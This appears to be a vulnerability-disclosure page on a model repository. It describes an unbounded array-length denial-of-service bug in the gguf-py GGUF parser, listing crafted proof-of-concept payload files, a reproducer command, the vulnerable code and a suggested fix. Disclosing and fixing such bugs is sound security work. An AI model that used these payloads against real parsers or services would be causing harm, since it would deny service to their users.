You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

GGUF MFV: Unbounded array-length DoS in gguf-py Python parser

huntr Model Format Vulnerability submission. Tier-1 MFV ($4,000).

This repository holds the proof-of-concept GGUF payloads and reproducer script for an unbounded array-length DoS in the canonical Python GGUF parser (gguf-py, shipped as PyPI gguf, maintained at ggml-org/llama.cpp).

Bug class

CWE-400 (Uncontrolled Resource Consumption) / CWE-789 (Memory Allocation with Excessive Size Value).

gguf-py/gguf/gguf_reader.py:239-255 reads a UINT64 alen from the GGUF file header and uses it directly as the loop bound when parsing array-typed metadata fields. No upper cap, no file-size consistency check. The C++ sibling parser in the same repository (ggml/src/gguf.cpp:270) DOES enforce GGUF_MAX_ARRAY_ELEMENTS = 1GB โ€” that protection was not propagated to the Python parser.

Payloads in this repo

File Size Declared alen Observed parse time (Python 3.13)
array_len_10000.gguf 56 bytes 10,000 0.05s
array_len_100000.gguf 56 bytes 100,000 0.42s
array_len_1000000.gguf 56 bytes 1,000,000 9.15s
malicious_array_len.gguf 56 bytes weaponized value parser hangs effectively forever
kv_count_10000.gguf 47 bytes 10,000 (kv_count branch) sibling primitive
kv_count_100000.gguf 47 bytes 100,000 (kv_count branch) sibling primitive
kv_count_1000000.gguf 47 bytes 1,000,000 (kv_count branch) sibling primitive

Linear scaling at ~10 us/iter. Extrapolation:

alen Parse time
10^7 ~91 s
10^8 ~15 min
10^9 (matches the C++ sibling cap) ~2.5 hours
10^12 ~110 days
2^64 - 1 (UINT64 max) ~5.8 million years

Reproducer

pip install gguf
python poc_gguf_py_array_length_dos.py

The script builds minimal 56-byte GGUF files with varying declared alen, then times the parse via gguf.GGUFReader(path). Linear scaling confirms the unbounded loop. Replay with kv_count_*.gguf against the _build_fields / _build_tensor_info loops at line 165 for the sibling primitive.

Sink (verbatim)

llama.cpp/gguf-py/gguf/gguf_reader.py:239-255:

if gtype == GGUFValueType.ARRAY:
    raw_itype = self._get(offs, np.uint32)
    offs += int(raw_itype.nbytes)
    alen = self._get(offs, np.uint64)               # attacker-controlled length
    offs += int(alen.nbytes)
    aparts: list[npt.NDArray[Any]] = [raw_itype, alen]
    data_idxs: list[int] = []
    for idx in range(alen[0]):                       # unbounded iteration
        curr_size, curr_parts, curr_idxs, curr_types = self._get_field_parts(offs, raw_itype[0])
        if idx == 0:
            types += curr_types
        idxs_offs = len(aparts)
        aparts += curr_parts                         # list growth per iter
        data_idxs += (idx + idxs_offs for idx in curr_idxs)
        offs += curr_size
    return offs - orig_offs, aparts, data_idxs, types

Suggested fix

Mirror the C++ cap:

GGUF_MAX_ARRAY_ELEMENTS = 1024 * 1024 * 1024   # 1 GiB element cap
GGUF_MAX_STRING_LENGTH  = 1024 * 1024 * 1024   # 1 GiB string cap

if int(alen[0]) > GGUF_MAX_ARRAY_ELEMENTS:
    raise ValueError(f"GGUF array length {alen[0]} exceeds max {GGUF_MAX_ARRAY_ELEMENTS}")

Same protections needed for tensor_count and kv_count reads at line 165.

Disclosure status

Submitted to huntr as a Tier-1 Model Format Vulnerability against the GGUF format. Sibling-class to this researcher's prior 6 MFV memory-amplification findings on npy / npz / messagepack / pickle / parquet / onnx (May 2026), same primitive class.

The maintainer ggml-org/llama.cpp is being notified through the huntr disclosure flow.

Downloads last month
2
GGUF
Model size
0 params
Architecture
Hardware compatibility
Log In to add your hardware

We're not able to determine the quantization variants.

Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support